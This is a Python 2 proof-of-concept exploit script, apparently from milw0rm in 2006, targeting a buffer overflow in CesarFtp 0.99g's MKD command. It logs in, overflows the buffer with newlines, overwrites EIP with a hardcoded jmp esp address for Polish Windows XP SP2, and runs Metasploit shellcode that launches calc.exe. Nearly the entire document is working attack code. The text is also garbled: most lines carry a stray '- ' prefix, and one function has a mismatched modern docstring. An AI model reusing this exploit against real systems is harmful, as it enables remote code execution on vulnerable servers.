- #!/usr/bin/python
- #CesarFtp 0.99g 0day Exploit
- #Proof of Concept: execute calc.exe
- #Tested on XP sp2 polish
- #Bug found by h07 [h07@interia.pl]
- #Date: 10.06.2006
- from socket import *
- shellcode = ( #execute calc.exe <metasploit.com>
- "\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
- "\xde\x42\xd1\x83\xeb\xfc\xe2\xf4\xf5\xb4\xa9\x9c\xe1\x27\xbd\x2e"
- "\xf6\xbe\xc9\xbd\x2d\xfa\xc9\x94\x35\x55\x3e\xd4\x71\xdf\xad\x5a"
- "\x46\xc6\xc9\x8e\x29\xdf\xa9\x98\x82\xea\xc9\xd0\xe7\xef\x82\x48"
- "\xa5\x5a\x82\xa5\x0e\x1f\x88\xdc\x08\x1c\xa9\x25\x32\x8a\x66\xf9"
- "\x7c\x3b\xc9\x8e\x2d\xdf\xa9\xb7\x82\xd2\x09\x5a\x56\xc2\x43\x3a"
- "\x0a\xf2\xc9\x58\x65\xfa\x5e\xb0\xca\xef\x99\xb5\x82\x9d\x72\x5a"
- "\x49\xd2\xc9\xa1\x15\x73\xc9\x91\x01\x80\x2a\x5f\x47\xd0\xae\x81"
- "\xf6\x08\x24\x82\x6f\xb6\x71\xe3\x61\xa9\x31\xe3\x56\x8a\xbd\x01"
- "\x61\x15\xaf\x2d\x32\x8e\xbd\x07\x56\x57\xa7\xb7\x88\x33\x4a\xd3"
- "\x5c\xb4\x40\x2e\xd9\xb6\x9b\xd8\xfc\x73\x15\x2e\xdf\x8d\x11\x82"
- "\x5a\x9d\x11\x92\x5a\x21\x92\xb9\xc9\x76\x4e\xde\x6f\xb6\x52\x30"
- "\x6f\x8d\xcb\x30\x9c\xb6\xae\x28\xa3\xbe\x15\x2e\xdf\xb4\x52\x80"
- "\x5c\x21\x92\xb7\x63\xba\x24\xb9\x6a\xb3\x28\x81\x50\xf7\x8e\x58"
- "\xee\xb4\x06\x58\xeb\xef\x82\x22\xa3\x4b\xcb\x2c\xf7\x9c\x6f\x2f"
- "\x4b\xf2\xcf\xab\x31\x75\xe9\x7a\x61\xac\xbc\x62\x1f\x21\x37\xf9"
- "\xf6\x08\x19\x86\x5b\x8f\x13\x80\x63\xdf\x13\x80\x5c\x8f\xbd\x01"
- "\x61\x73\x9b\xd4\xc7\x8d\xbd\x07\x63\x21\xbd\xe6\xf6\x0e\x2a\x36"
- "\x70\x18\x3b\x2e\x7c\xda\xbd\x07\xf6\xa9\xbe\x2e\xd9\xb6\xb2\x5b"
- "\x0d\x81\x11\x2e\xdf\x21\x92\xd1")
def intel_order(i):
    """Pack the low 32 bits of integer ``i`` as a 4-character little-endian string.

    Bytes are emitted least-significant first (``i % 256``, then the next byte
    after a right shift by 8), i.e. the same byte order as ``struct.pack("<I", i)``
    for values that fit in 32 bits; any bits above the 32nd are simply never
    read.  The return value is a ``str`` of four ``chr`` values -- the rest of
    this script uses Python 2 ``print`` statements, so byte-string semantics
    are assumed here.
    """
    a = chr(i % 256)  # byte 0 (least significant)
    i = i >> 8
    b = chr(i % 256)  # byte 1
    i = i >> 8
    c = chr(i % 256)  # byte 2
    i = i >> 8
    d = chr(i % 256)  # byte 3 (most significant of the low 32 bits)
    str = "%c%c%c%c" % (a, b, c, d)  # NOTE: local name shadows the builtin ``str``
    return str
- host = "192.168.13.132"
- port = 21
- user = "ftp"
- password = "ftp"
- EIP = 0x77D8AF0A #jmp esp <shell32.dll XP sp2 polish>
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((host, port))
- print s.recv(1024)
- s.send("user %s\r\n" % (user))
- print s.recv(1024)
- s.send("pass %s\r\n" % (password))
- print s.recv(1024)
- buffer = "MKD "
- buffer += "\n" * 671
- buffer += "A" * 3 + intel_order(EIP)
- buffer += "\x90" * 10 + shellcode
- buffer += "\r\n"
- print "len: %d" % (len(buffer))
- s.send(buffer)
- print s.recv(1024)
- s.close()
- #EoF
- # milw0rm.com [2006-06-12]